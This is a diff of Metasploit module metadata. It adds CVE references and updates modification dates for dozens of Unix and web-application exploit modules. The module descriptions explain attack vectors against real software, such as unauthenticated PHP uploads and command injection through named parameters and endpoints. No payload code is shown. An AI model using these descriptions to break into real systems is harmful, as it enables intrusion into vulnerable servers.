    "path": "/modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "unix/misc/polycom_hdx_auth_bypass",
@@ -132159,6 +133307,7 @@
    ],
    "description": "Within Polycom command shell, a command execution flaw exists in\n          lan traceroute, one of the dev commands, which allows for an\n          attacker to execute arbitrary payloads with telnet or openssl.",
    "references": [
+      "CVE-2025-34093",
      "URL-https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/"
    ],
    "platform": "Unix",
@@ -132169,7 +133318,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/misc/polycom_hdx_traceroute_exec",
@@ -132614,6 +133763,7 @@
    ],
    "description": "This module exploits a vulnerability in SonicWall Global\n          Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n          and below. This virtual appliance can be downloaded from\n          http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n          holistic way to manage your entire network security environment.'\n\n          These vulnerable versions (8.1 Build 8110.1197 and below) do not\n          prevent unauthenticated, external entities from making XML-RPC\n          requests to port 21009 of the virtual app. After the XML-RPC call\n          is made, a shell script is called like so:\n          'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.",
    "references": [
+      "CVE-2014-8420",
      "URL-https://www.digitaldefense.com/digital-defense/vrt-discoveries/",
      "URL-https://slides.com/kernelsmith/bsidesaustin2018/#/"
    ],
@@ -132638,7 +133788,7 @@
    "targets": [
      "SonicWall Global Management System Virtual Appliance"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/sonicwall/sonicwall_xmlrpc_rce",
@@ -132716,6 +133866,7 @@
    ],
    "description": "This module exploits a default hardcoded private SSH key or default hardcoded\n          login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made\n          by Array Networks. After logged in as the unprivileged user, it's possible to modify\n          the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.\n          Execution is possible by using the backend tool, running setuid, to turn the debug\n          monitoring on. This makes it possible to trigger a payload with root privileges.",
    "references": [
+      "CVE-2014-125121",
      "OSVDB-104652",
      "OSVDB-104653",
      "OSVDB-104654",
@@ -132729,7 +133880,7 @@
    "targets": [
      "vAPV 8.3.2.17 / vxAG 9.2.0.34"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb",
    "is_install_path": true,
    "ref_name": "unix/ssh/array_vxag_vapv_privkey_privesc",
@@ -132930,6 +134081,7 @@
    ],
    "description": "This module exploits a command injection in Ajenti == 2.1.31.\n          By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.",
    "references": [
+      "CVE-2019-25066",
      "EDB-47497"
    ],
    "platform": "Python",
@@ -132953,7 +134105,7 @@
    "targets": [
      "Ajenti == 2.1.31"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/ajenti_auth_username_cmd_injection.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/ajenti_auth_username_cmd_injection",
@@ -133402,6 +134554,7 @@
    ],
    "description": "This module exploits multiple vulnerabilities in Bolt CMS version 3.7.0\n          and 3.6.* in order to execute arbitrary commands as the user running Bolt.\n\n          This module first takes advantage of a vulnerability that allows an\n          authenticated user to change the username in /bolt/profile to a PHP\n          `system($_GET[\"\"])` variable. Next, the module obtains a list of tokens\n          from `/async/browse/cache/.sessions` and uses these to create files with\n          the blacklisted `.php` extention via HTTP POST requests to\n          `/async/folder/rename`. For each created file, the module checks the HTTP\n          response for evidence that the file can be used to execute arbitrary\n          commands via the created PHP $_GET variable. If the response is negative,\n          the file is deleted, otherwise the payload is executed via an HTTP\n          get request in this format: `/files/<rogue_PHP_file>?<$_GET_var>=<payload>`\n\n          Valid credentials for a Bolt CMS user are required. This module has been\n          successfully tested against Bolt CMS 3.7.0 running on CentOS 7.",
    "references": [
+      "CVE-2025-34086",
      "EDB-48296",
      "URL-https://github.com/bolt/bolt/releases/tag/3.7.1"
    ],
@@ -133428,7 +134581,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2023-03-13 10:31:27 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/bolt_authenticated_rce",
@@ -133526,6 +134679,7 @@
    ],
    "description": "This module exploits an arbitrary command execution vulnerability in the\n          Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n          0.8.6-d are vulnerable.",
    "references": [
+      "CVE-2005-10004",
      "OSVDB-17539",
      "BID-14042"
    ],
@@ -133550,7 +134704,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/cacti_graphimage_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/cacti_graphimage_exec",
@@ -133762,6 +134916,7 @@
    ],
    "description": "This module exploits a vulnerability found in ClipBucket version 2.6 and lower.\n          The script \"/admin_area/charts/ofc-library/ofc_upload_image.php\" can be used to\n          upload arbitrary code without any authentication. This module has been tested\n          on version 2.6 on CentOS 5.9 32-bit.",
    "references": [
+      "CVE-2013-10040",
      "PACKETSTORM-123480"
    ],
    "platform": "PHP",
@@ -133785,7 +134940,7 @@
    "targets": [
      "Clipbucket 2.6"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/clipbucket_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/clipbucket_upload_exec",
@@ -134021,6 +135176,7 @@
    ],
    "description": "This module exploits a previously unpublished vulnerability in the\n          Dogfood CRM mail function which is vulnerable to command injection\n          in the spell check feature.  Because of character restrictions, this\n          exploit works best with the double-reverse telnet payload. This\n          vulnerability was discovered by LSO and affects v2.0.10.",
    "references": [
+      "CVE-2009-20010",
      "OSVDB-54707",
      "URL-http://downloads.sourceforge.net/dogfood/"
    ],
@@ -134045,7 +135201,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/dogfood_spell_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/dogfood_spell_exec",
@@ -134338,6 +135494,7 @@
    ],
    "description": "This module exploits a vulnerability found in EGallery 1.2 By abusing the\n          uploadify.php file, a malicious user can upload a file to the egallery/ directory\n          without any authentication, which results in arbitrary code execution. The module\n          has been tested successfully on Ubuntu 10.04.",
    "references": [
+      "CVE-2012-10052",
      "OSVDB-83891",
      "BID-54464",
      "URL-http://web.archive.org/web/20170128123244/http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html"
@@ -134363,7 +135520,7 @@
    "targets": [
      "EGallery 1.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/egallery_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/egallery_upload_exec",
@@ -134458,6 +135615,7 @@
    ],
    "description": "This module exploits a file upload vulnerability found in FlashChat\n          versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload\n          feature in order to upload malicious PHP files without authentication\n          which results in arbitrary remote code execution as the web server user.",
    "references": [
+      "CVE-2013-10038",
      "OSVDB-98233",
      "EDB-28709"
    ],
@@ -134482,7 +135640,7 @@
    "targets": [
      "Generic (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/flashchat_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/flashchat_upload_exec",
@@ -134660,7 +135818,7 @@
      "Automatic (Unix In-Memory)",
      "Automatic (Linux Dropper)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-08 10:45:59 +0000",
    "path": "/modules/exploits/unix/webapp/fusionpbx_exec_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/fusionpbx_exec_cmd_exec",
@@ -134808,6 +135966,7 @@
    ],
    "description": "This module exploits a file upload vulnerability in GetSimple CMS. By abusing the\n          upload.php file, a malicious authenticated user can upload an arbitrary file,\n          including PHP code, which results in arbitrary code execution.",
    "references": [
+      "CVE-2013-10032",
      "EDB-25405",
      "OSVDB-93034"
    ],
@@ -134832,7 +135991,7 @@
    "targets": [
      "Generic (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/get_simple_cms_upload_exec",
@@ -135100,6 +136259,7 @@
    ],
    "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n          possibly prior.  Attackers can abuse the upload feature in order to upload a\n          malicious PHP file without authentication, which results in arbitrary remote code\n          execution.",
    "references": [
+      "CVE-2013-10055",
      "OSVDB-94405",
      "EDB-26243"
    ],
@@ -135125,7 +136285,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/havalite_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/havalite_upload_exec",
@@ -135219,6 +136379,7 @@
    ],
    "description": "This module exploits a PHP code execution vulnerability in\n          HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'\n          is not removed after installation allowing unauthenticated users to\n          write PHP code to the application configuration file 'config.php'.\n\n          Note: This exploit will overwrite the application configuration file\n          rendering the application unusable.",
    "references": [
+      "CVE-2014-125116",
      "EDB-34273",
      "OSVDB-109838"
    ],
@@ -135243,7 +136404,7 @@
    "targets": [
      "HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/hybridauth_install_php_exec",
@@ -135278,6 +136439,7 @@
    ],
    "description": "This module exploits an arbitrary PHP command execution vulnerability because of a\n          dangerous use of eval() in InstantCMS in versions 1.6 and prior.",
    "references": [
+      "CVE-2013-10051",
      "BID-60816",
      "PACKETSTORM-122176"
    ],
@@ -135302,7 +136464,7 @@
    "targets": [
      "InstantCMS 1.6"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/instantcms_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/instantcms_exec",
@@ -135825,6 +136987,7 @@
    ],
    "description": "This module exploits a SQL injection vulnerability in Kimai version\n          0.9.2.x. The 'db_restore.php' file allows unauthenticated users to\n          execute arbitrary SQL queries. This module writes a PHP payload to\n          disk if the following conditions are met: The PHP configuration must\n          have 'display_errors' enabled, Kimai must be configured to use a\n          MySQL database running on localhost; and the MySQL user must have\n          write permission to the Kimai 'temporary' directory.",
    "references": [
+      "CVE-2013-10033",
      "EDB-25606",
      "OSVDB-93547"
    ],
@@ -135849,7 +137012,7 @@
    "targets": [
      "Kimai version 0.9.2.x (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/kimai_sqli.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/kimai_sqli",
@@ -135883,6 +137046,7 @@
    ],
    "description": "This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and\n          possibly prior.  Attackers can bypass the file extension check and abuse the upload\n          feature in order to upload a malicious PHP file without authentication, which\n          results in arbitrary remote code execution.",
    "references": [
+      "CVE-2013-10054",
      "OSVDB-94391",
      "EDB-26213"
    ],
@@ -135908,7 +137072,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/libretto_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/libretto_upload_exec",
@@ -136174,6 +137338,7 @@
    ],
    "description": "myBB is a popular open source PHP forum software. Version 1.6.4 contained an\n          unauthorized backdoor, distributed as part of the vendor's source package.",
    "references": [
+      "CVE-2011-10018",
      "OSVDB-76111",
      "BID-49993",
      "URL-http://web.archive.org/web/20121010011259/http://secunia.com/advisories/46300/"
@@ -136199,7 +137364,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/mybb_backdoor.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/mybb_backdoor",
@@ -136353,6 +137518,7 @@
    ],
    "description": "This module exploits a vulnerability found in Nagios XI Network Monitor's\n          component 'Graph Explorer'.  An authenticated user can execute system commands\n          by injecting it in several parameters, such as in visApi.php's 'host' parameter,\n          which results in remote code execution.",
    "references": [
+      "CVE-2012-10029",
      "OSVDB-83552",
      "BID-54263",
      "PACKETSTORM-118497"
@@ -136378,7 +137544,7 @@
    "targets": [
      "Graph Explorer Component prior to 1.3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/nagios_graph_explorer.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/nagios_graph_explorer",
@@ -136412,6 +137578,7 @@
    ],
    "description": "This module exploits a vulnerability found in Narcissus image configuration\n          function.  This is due to the backend.php file not handling the $release parameter\n          properly, and then passes it on to the configure_image() function.  In this\n          function, the $release parameter can be used to inject system commands for\n          passthru (a PHP function that's meant to be used to run a bash script by the\n          vulnerable application), which allows remote code execution under the context\n          of the web server.",
    "references": [
+      "CVE-2012-10033",
      "EDB-22709",
      "OSVDB-87410"
    ],
@@ -136436,7 +137603,7 @@
    "targets": [
      "Narcissus"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/narcissus_backend_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/narcissus_backend_exec",
@@ -136598,6 +137765,7 @@
    ],
    "description": "This module exploits a vulnerability found in OpenEMR version 4.1.1 Patch 14 and lower.\n          When logging in as any non-admin user, it's possible to retrieve the admin SHA1 password\n          hash from the database through SQL injection. The SQL injection vulnerability exists\n          in the \"new_comprehensive_save.php\" page. This hash can be used to log in as the admin\n          user. After logging in, the \"manage_site_files.php\" page will be used to upload arbitrary\n          code.",
    "references": [
+      "CVE-2013-10044",
      "OSVDB-97482",
      "EDB-28329"
    ],
@@ -136622,7 +137790,7 @@
    "targets": [
      "OpenEMR"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/openemr_sqli_privesc_upload",
@@ -136835,6 +138003,7 @@
    ],
    "description": "This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.",
    "references": [
+      "CVE-2019-25065",
      "EDB-47691"
    ],
    "platform": "Linux",
@@ -136858,7 +138027,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/opennetadmin_ping_cmd_injection",
@@ -137196,6 +138365,7 @@
    ],
    "description": "osCommerce is a popular open source E-Commerce application.\n          The admin console contains a file management utility that\n          allows administrators to upload, download, and edit files.\n          This could be abused to allow unauthenticated attackers to\n          execute arbitrary code with the permissions of the\n          webserver.",
    "references": [
+      "CVE-2009-20006",
      "OSVDB-60018",
      "EDB-9556"
    ],
@@ -137220,7 +138390,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/oscommerce_filemanager.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/oscommerce_filemanager",
@@ -137314,6 +138484,7 @@
    ],
    "description": "This module exploits a PHP code execution vulnerability in php-Charts\n          version 1.0 which could be abused to allow users to execute arbitrary\n          PHP code under the context of the webserver user. The 'url.php' script\n          calls eval() with user controlled data from any HTTP GET parameter name.",
    "references": [
+      "CVE-2013-10070",
      "OSVDB-89334",
      "BID-57448",
      "EDB-24201"
@@ -137339,7 +138510,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/php_charts_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/php_charts_exec",
@@ -137786,6 +138957,7 @@
    ],
    "description": "This module will generate a plugin, pack the payload into it\n          and upload it to a server running Piwik. Superuser Credentials are\n          required to run this module. This module does not work against Piwik 1\n          as there is no option to upload custom plugins. Piwik disabled\n          custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you\n          have to enable custom plugin uploads via the config file.\n          Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.",
    "references": [
+      "CVE-2025-34104",
      "URL-https://firefart.at/post/turning_piwik_superuser_creds_into_rce/",
      "URL-https://piwik.org/faq/plugins/faq_21/",
      "URL-https://piwik.org/changelog/piwik-3-0-3/"
@@ -137811,7 +138983,7 @@
    "targets": [
      "Piwik"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/piwik_superuser_plugin_upload",
@@ -137845,6 +139017,7 @@
    ],
    "description": "This module exploits a vulnerability found in Project Pier.  The application's\n          uploading tool does not require any authentication, which allows a malicious user\n          to upload an arbitrary file onto the web server, and then cause remote code\n          execution by simply requesting it. This module is known to work against Apache\n          servers due to the way it handles an extension name, but the vulnerability may\n          not be exploitable on others.",
    "references": [
+      "CVE-2012-10036",
      "OSVDB-85881",
      "EDB-21929",
      "PACKETSTORM-117070"
@@ -137871,7 +139044,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/projectpier_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/projectpier_upload_exec",
@@ -137905,6 +139078,7 @@
    ],
    "description": "This module exploits a file upload vulnerability in ProjectSend\n          revisions 100 to 561. The 'process-upload.php' file allows\n          unauthenticated users to upload PHP files resulting in remote\n          code execution as the web server user.",
    "references": [
+      "CVE-2014-9567",
      "EDB-35424"
    ],
    "platform": "PHP",
@@ -137928,7 +139102,7 @@
    "targets": [
      "ProjectSend (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/projectsend_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/projectsend_upload_exec",
@@ -138198,6 +139372,7 @@
    ],
    "description": "This module exploits a file upload vulnerability found in Simple\n          E-Document versions 3.0 to 3.1. Attackers can bypass authentication and\n          abuse the upload feature in order to upload malicious PHP files which\n          results in arbitrary remote code execution as the web server user. File\n          uploads are disabled by default.",
    "references": [
+      "CVE-2014-125126",
      "EDB-31142"
    ],
    "platform": "PHP",
@@ -138221,7 +139396,7 @@
    "targets": [
      "Generic (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/simple_e_document_upload_exec",
@@ -138546,6 +139721,7 @@
    ],
    "description": "This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23\n          which could be abused to allow unauthenticated users to execute arbitrary PHP code with\n          the permissions of the webserver. The dangerous unserialize() call exists in the\n          '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()\n          method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.",
    "references": [
+      "CVE-2025-25034",
      "URL-http://karmainsecurity.com/KIS-2016-07",
      "URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-001",
      "URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-008",
@@ -138572,7 +139748,7 @@
    "targets": [
      "SugarCRM CE <= 6.5.23"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/sugarcrm_rest_unserialize_exec",
@@ -138906,6 +140082,7 @@
    ],
    "description": "This module exploits a file upload vulnerability in Tiki Wiki <= 15.1\n          which could be abused to allow unauthenticated users to execute arbitrary code\n          under the context of the web server user.\n\n          The issue comes with one of the 3rd party components. Name of that component is\n          ELFinder -version 2.0-. This component comes with default example page which\n          demonstrates file operations such as upload, remove, rename, create directory etc.\n          Default configuration does not force validations such as file extension, content-type etc.\n          Thus, unauthenticated user can upload PHP file.\n\n          The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.",
    "references": [
+      "CVE-2025-34111",
      "URL-https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability",
      "URL-https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released"
    ],
@@ -138930,7 +140107,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/tikiwiki_upload_exec",
@@ -139562,6 +140739,7 @@
    ],
    "description": "This module exploits a vulnerability in VICIdial versions\n          2.9 RC 1 to 2.13 RC1 which allows unauthenticated users\n          to execute arbitrary operating system commands as the web\n          server user if password encryption is enabled (disabled\n          by default).\n\n          When password encryption is enabled the user's password\n          supplied using HTTP basic authentication is used in a call\n          to exec().\n\n          This module has been tested successfully on version 2.11 RC2\n          and 2.13 RC1 on CentOS.",
    "references": [
+      "CVE-2025-34099",
      "URL-http://www.vicidial.org/VICIDIALmantis/view.php?id=1016"
    ],
    "platform": "Unix",
@@ -139585,7 +140763,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/vicidial_user_authorization_unauth_cmd_exec",
@@ -139738,6 +140916,7 @@
    ],
    "description": "This module exploits a command execution vulnerability in WebTester\n          version 5.x. The 'install2.php' file allows unauthenticated users to\n          execute arbitrary commands in the 'cpusername', 'cppassword' and\n          'cpdomain' parameters.",
    "references": [
+      "CVE-2013-10037",
      "OSVDB-98750",
      "URL-https://sourceforge.net/p/webtesteronline/bugs/3/"
    ],
@@ -139762,7 +140941,7 @@
    "targets": [
      "WebTester version 5.x"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/webtester_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/webtester_exec",
@@ -139849,6 +141028,7 @@
    ],
    "description": "This module exploits a remote file inclusion flaw in the WordPress blogging\n          software plugin known as Advanced Custom Fields. The vulnerability allows for remote\n          file inclusion and remote code execution via the export.php script. The Advanced\n          Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only\n          works when the php option allow_url_include is set to On (Default Off).",
    "references": [
+      "CVE-2012-10025",
      "OSVDB-87353",
      "URL-http://web.archive.org/web/20121223025326/http://secunia.com:80/advisories/51037",
      "WPVDB-6103"
@@ -139874,7 +141054,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_advanced_custom_fields_exec",
@@ -139908,6 +141088,7 @@
    ],
    "description": "This module exploits an arbitrary file upload in the WordPress Ajax Load More\n          version 2.8.1.1. It allows to upload arbitrary php files and get remote code\n          execution. This module has been tested successfully on WordPress Ajax Load More\n          2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.",
    "references": [
+      "CVE-2015-10140",
      "WPVDB-8209"
    ],
    "platform": "PHP",
@@ -139931,7 +141112,7 @@
    "targets": [
      "Ajax Load More 2.8.1.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_ajax_load_more_file_upload",
@@ -139965,6 +141146,7 @@
    ],
    "description": "This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress\n          plugin. By abusing the upload.php file, a malicious user can upload a file to a\n          temp directory without authentication, which results in arbitrary code execution.",
    "references": [
+      "CVE-2012-10026",
      "OSVDB-82653",
      "BID-53809",
      "EDB-18993",
@@ -139992,7 +141174,7 @@
    "targets": [
      "asset-manager <= 2.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_asset_manager_upload_exec",
@@ -140026,6 +141208,7 @@
    ],
    "description": "This module exploits an arbitrary PHP code upload in the WordPress Creative Contact\n          Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.",
    "references": [
+      "CVE-2014-8739",
      "EDB-35057",
      "OSVDB-113669",
      "WPVDB-7652"
@@ -140051,7 +141234,7 @@
    "targets": [
      "Creative Contact Form 0.9.7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_creativecontactform_file_upload",
@@ -140202,6 +141385,7 @@
    ],
    "description": "This module exploits an arbitrary PHP code execution flaw in the WordPress\n          blogging software plugin known as Foxypress. The vulnerability allows for arbitrary\n          file upload and remote code execution via the uploadify.php script. The Foxypress\n          plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.",
    "references": [
+      "CVE-2012-10020",
      "EDB-18991",
      "BID-53805",
      "WPVDB-6231"
@@ -140227,7 +141411,7 @@
    "targets": [
      "Foxypress 0.4.1.1 - 0.4.2.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_foxypress_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_foxypress_upload",
@@ -140261,6 +141445,7 @@
    ],
    "description": "The WordPress Front-end Editor plugin contains an authenticated file upload\n          vulnerability. An attacker can upload arbitrary files to the upload folder because\n          the plugin uses its own file upload mechanism instead of the WordPress API, which\n          incorrectly allows uploads of any file type.",
    "references": [
+      "CVE-2012-10019",
      "OSVDB-83637",
      "WPVDB-7569",
      "URL-http://web.archive.org/web/20170203203305/http://www.opensyscom.fr:80/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html"
@@ -140286,7 +141471,7 @@
    "targets": [
      "Front-End Editor 2.2.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_frontend_editor_file_upload",
@@ -140497,6 +141682,7 @@
    ],
